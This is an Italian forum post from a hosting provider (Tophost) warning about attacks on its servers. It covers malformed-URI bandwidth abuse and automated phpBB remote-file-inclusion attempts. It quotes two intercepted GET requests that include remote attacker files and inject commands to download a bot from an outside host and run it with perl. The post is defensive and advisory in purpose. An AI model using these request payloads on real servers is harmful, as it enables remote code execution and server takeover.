PROZONE powered by Tophost
  Home   Forum   Regolamento Help Login Registrati   *
Statistiche
Utenti
Utenti Totali: 1707
Ultimo utente: xal
Statistiche
Posts Totali: 29470
Topics Totali: 3404
Online Oggi: 51
Presenze Massime Online: 559
(23 Luglio 2008, 14:24:28)
Utenti Online
Utenti: 2
Visitatori: 41
Totale: 43
Siti amici
Design & Multimedia

Dire e Fare il blog che ti aiuta

Wordpress
Pagine: [1]
 
Autore Topic: Url Malformate  (Letto 7476 volte)
Tophost
Provider
*
Posts: 970


Url Malformate
« il: 29 Dicembre 2005, 19:43:32 »

Come ti vinco al gioco di ruolo![/size]

Salve a tutti, questa sera vogliamo parlare della nuova moda che sta' imperversando per la rete, e che sta' prendendo piede tra i giovani che giocano in rete e che vogliono vincere a tutti i costi.

Come fare se si e' in svantaggio, in un combattimento e il nostro avversario e' vicino alla vittoria?

Semplice, basta saturare l'adsl del nostro concorrente ed il gioco e' fatto! Visto che per ovvi motivi non possiamo saturare l'adsl di un altro, con la nostra adsl in quanto provandoci finiremmo per saturare anche la nostra linea internet, ci facciamo aiutare da un server di un provider qualsiasi, basta dargli in pasto una semplice stringa (URI malformata) e il server del provider consumera' tutta la sua banda a disposizione per saturare l'adsl altrui... e la vittoria sara' sicura!

Con questa tecnica si va a causare problemi al server del provider scelto, che mentre aiuta (suo malgrado) i ragazzini a vincere una battaglia nel loro gioco di ruolo preferito, non riesce a fare il suo lavoro.

Visto che la moda in tal senso sta' conoscendo una grande escalation, forse perche' e' facile reperire informazioni in su come fare e si tratta di una tecnica banale che puo' essere messa in piedi anche da chi ha conoscenze limitate,   nei server Tophost abbiamo implementato un controllo che blocca tutti questi tipi di URI malformati.

Ecco un esempio di un paio di stringhe malevole intercettate e bloccate, stringhe che miravano a qualcosa di piu' che far vincere a qualcuno il gioco di ruolo:

Codice:
GET //modules/Forums/admin/admin_styles.php?
phpbb_root__path=http://www.foxcf.hpgvip.ig.com.br/cse.gif?
&cmd=cd20%/tmp;fetch%20http://cartoesdeamor.fromru.com
/bot%20;%20perl%20bot

GET
/php/html//modules/Forums/admin/admin_styles.php?
phpbb_root__path=http://www.phantasmairc.hpgvip.com.br
/CMD.txt?&cmd=id
La seconda di queste due stringhe tenta di far inserire in "/tmp" e poi di far eseguire il contenuto del file "CMD.txt", file che contiente tentativi di scalare i privilegi di root del server, sfruttando vulnerabilita' note.

Abbiamo analizzato tale file e possiamo dire che tutti gli exploit contenuti sono stati correntemente gia patchati e non avrebbero arrecato danno nei server Tophost.

Se contiamo il fatto che tali tentativi di exploit e invio di URI malformati vengono effettuati in automatico da script programmati appositamente, che prima si interfacciano con google per reperire un elenco di siti candidati e poi eseguono alla cieca decine e decine di tentativi provando tutti i tipi di exploit fino a che non trovano il modo di entrare, questo fa capire l'importanza di tenere aggiornati tutti gli script pubblicati dal  lato utente e tutti i moduli/software del server dal lato del provider!

P.S. Va da se che quanto pubblicato in questo messaggio non vuole essere un'incitamento a delinquere.

Buona serata.
« Ultima modifica: 29 Dicembre 2005, 19:48:38 da Tophost » Loggato
Pagine: [1]
 
 
Salta a:  

Oggetto Iniziato da Risposte Visto Ultimo Post
Guida A Mod_rewrite (parte 1) « 1 2 3 4 5 » doGmaI 68 48830 Ultimo Post 14 Ottobre 2009, 16:42:18
da sOoN
Sito non raggiungibile extrabyte 4 1978 Ultimo Post 15 Maggio 2009, 13:11:16
da Volverine
Powered by MySQL Powered by PHP Powered by SMF 1.1.8 | SMF © 2006-2008, Simple Machines LLC
Traduzione Italiana a cura di SMItalia

TinyPortal v0.9.8 © Bloc
XHTML 1.0 Valido! CSS Valido!


Ultima visita di Google a questa pagina Oggi alle 00:37:08